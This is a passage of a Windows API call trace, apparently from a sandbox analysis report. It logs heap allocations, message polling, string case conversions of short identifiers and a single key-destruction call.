dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0190.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0190.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0190.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0190.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0190.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0190.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0190.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0190.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0190.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0190.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0190.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0190.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0190.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0190.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0190.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0190.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0190.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0190.891] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01e0 [0190.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01b0 [0190.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01d0 [0190.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01c0 [0190.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0170 [0190.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.892] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.892] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01e0 [0190.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01b0 [0190.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.892] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0190.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0190.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0190.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0190.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0190.892] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.892] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.893] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0190.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0190.893] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0190.893] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0190.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0190.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.893] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0190.893] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.893] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0190.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0190.893] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0190.893] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0190.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0190.894] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0190.894] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.894] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0190.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0190.894] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.894] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0190.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0190.894] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.894] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0190.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0190.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.895] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.895] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.895] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0190.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0190.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.895] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.895] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.895] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0190.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0190.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.895] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.895] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.896] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0190.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.896] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0190.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0190.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0190.896] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0190.896] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0190.896] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0190.896] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0190.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0190.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0190.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0190.897] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0190.897] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.897] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0190.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0190.897] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.897] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0190.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0190.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.897] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0190.898] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.898] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0190.898] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0190.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0190.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0190.899] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0190.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0190.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0190.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0190.899] CryptDestroyKey (hKey=0xaa5860) returned 1 [0190.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0190.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0190.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0190.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0190.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0190.899] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0190.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0190.899] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0190.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0190.899] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0190.900] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0190.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0190.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0190.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0190.900] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0190.900] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.900] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0190.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0190.900] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0190.900] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0190.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0190.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0190.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0190.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.900] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0190.900] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0190.901] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0190.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0190.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0190.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0190.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.901] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0190.901] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0190.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0190.901] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.901] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0190.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0190.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0190.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0190.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.901] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.901] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0190.902] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0190.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) 